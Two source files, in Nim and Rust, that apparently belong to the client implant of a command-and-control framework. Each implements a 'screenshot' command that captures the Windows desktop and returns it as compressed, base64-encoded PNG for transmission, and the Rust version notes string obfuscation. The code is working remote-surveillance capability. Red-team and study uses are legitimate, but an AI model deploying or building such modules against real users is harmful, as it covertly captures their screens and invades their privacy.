File: client/commands/screenshot.nim
from winim import BI_RGB, BitBlt, BitmapInfo, CreateCompatibleBitmap, CreateCompatibleDC, 
                    CreateDIBSection, DeleteObject, DIB_RGB_COLORS, GetClientRect, GetDC, 
                    GetDesktopWindow, GetDIBits, SelectObject, SRCCOPY
from winim/inc/windef import Rect, HWND
import base64
import pixie
import zippy

# Take a screenshot of the user's desktop and send it back as an encoded string
proc screenshot*(args : varargs[string]) : string =
    # Get the size of the main screen
    var screenRectangle : windef.Rect
    GetClientRect(GetDesktopWindow(), addr screenRectangle)
    let
        width = screenRectangle.right - screenRectangle.left
        height = screenRectangle.bottom - screenRectangle.top

    # Create a bitmap to store the screenshot
    var image = newImage(width, height)

    # Copy screen to bitmap image
    var
        hScreen = GetDC(cast[HWND](nil))
        hDC = CreateCompatibleDC(hScreen)
        hBitmap = CreateCompatibleBitmap(hScreen, int32(width), int32(height))

    discard SelectObject(hDC, hBitmap)
    discard BitBlt(hDC, 0, 0, int32(width), int32(height), hScreen, int32(screenRectangle.left), int32(screenRectangle.top), SRCCOPY)

    # Set up the bitmap image structure
    var bmi : BitmapInfo
    bmi.bmiHeader.biSize = int32(sizeof(BitmapInfo))
    bmi.bmiHeader.biWidth = int32(width)
    bmi.bmiHeader.biHeight = int32(height)
    bmi.bmiHeader.biPlanes = 1
    bmi.bmiHeader.biBitCount = 32
    bmi.bmiHeader.biCompression = BI_RGB
    bmi.bmiHeader.biSizeImage = width * height * 4

    # Copy the bitmap data into the image
    discard CreateDIBSection(hDC, addr bmi, DIB_RGB_COLORS, cast[ptr pointer](unsafeAddr image.data[0]), 0, 0)
    discard GetDIBits(hDC, hBitmap, 0, height, cast[pointer](unsafeAddr image.data[0]), addr bmi, DIB_RGB_COLORS)

    # Flip the resulting image to the correct orientation
    image.flipVertical()
    for i in 0 ..< image.width * image.height:
        swap(image.data[i].r, image.data[i].b)

    # Encode the image as PNG, and compress and encode it for transmission
    result = base64.encode(compress(image.encodeImage(PngFormat)))

    # Clean up
    discard DeleteObject(hBitmap)
    discard DeleteObject(hDC)

File: client-rs/src/internal/commands/screenshot.rs
use base64::{engine::general_purpose::STANDARD, Engine as _};
use flate2::{write::GzEncoder, Compression};
use fmtools::format; // using obfstr to obfuscate
use image::codecs::png::PngEncoder;
use image::ImageEncoder;
use std::io::Write;
use std::os::raw::c_void;
use windows_sys::Win32::Foundation::{HWND, RECT};
use windows_sys::Win32::Graphics::Gdi::{
    BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, DeleteDC, DeleteObject, GetDC, GetDIBits,
    SelectObject, BITMAPINFO, BITMAPINFOHEADER, BI_RGB, DIB_RGB_COLORS, HDC, SRCCOPY,
};
use windows_sys::Win32::UI::WindowsAndMessaging::{GetClientRect, GetDesktopWindow};

pub(crate) fn screenshot() -> String {
    let mut image_data: Vec<u8>;
    let width: i32;
    let height: i32;

    // Use Windows API to capture image data
    unsafe {
        let mut screen_rect: RECT = std::mem::zeroed();
        GetClientRect(GetDesktopWindow(), &mut screen_rect);
        width = screen_rect.right - screen_rect.left;
        height = screen_rect.bottom - screen_rect.top;

        let h_screen: HDC = GetDC(GetDesktopWindow() as HWND);
        let h_dc: HDC = CreateCompatibleDC(h_screen);
        let h_bitmap = CreateCompatibleBitmap(h_screen, width, height);

        SelectObject(h_dc, h_bitmap as _);
        BitBlt(
            h_dc,
            0,
            0,
            width,
            height,
            h_screen,
            screen_rect.left,
            screen_rect.top,
            SRCCOPY,
        );

        let mut bitmap_info: BITMAPINFO = std::mem::zeroed();
        bitmap_info.bmiHeader.biSize = std::mem::size_of::<BITMAPINFOHEADER>() as u32;
        bitmap_info.bmiHeader.biWidth = width;
        bitmap_info.bmiHeader.biHeight = -height;
        bitmap_info.bmiHeader.biPlanes = 1;
        bitmap_info.bmiHeader.biBitCount = 32;
        bitmap_info.bmiHeader.biCompression = BI_RGB;

        image_data = vec![0; (width * height * 4) as usize];
        GetDIBits(
            h_dc,
            h_bitmap,
            0,
            height as u32,
            image_data.as_mut_ptr().cast::<c_void>(),
            &mut bitmap_info,
            DIB_RGB_COLORS,
        );

        DeleteObject(h_bitmap as _);
        DeleteDC(h_dc);
    }

    // Convert the image data from BGRA to RGBA
    for pixel in image_data.chunks_mut(4) {
        let (b, g, r, a) = (pixel[0], pixel[1], pixel[2], pixel[3]);
        pixel[0] = r;
        pixel[1] = g;
        pixel[2] = b;
        pixel[3] = a;
    }

    // Encode the image data as PNG
    let mut png_data = vec![];
    {
        let encoder = PngEncoder::new(&mut png_data);
        if let Err(e) = encoder.write_image(
            &image_data,
            width as u32,
            height as u32,
            image::ExtendedColorType::Rgba8,
        ) {
            return format!("Failed to encode image as PNG: "{e});
        }
    }

    // Compress the image data
    let mut encoder = GzEncoder::new(Vec::new(), Compression::default());

    if let Err(e) = encoder.write_all(&png_data) {
        return format!("Failed to compress image data: "{e});
    };

    match encoder.finish() {
        Ok(compressed_data) => {
            // Return the compressed image data as a base64 string
            STANDARD.encode(compressed_data)
        }
        Err(e) => format!("Failed to compress image data: "{e}),
    }
}
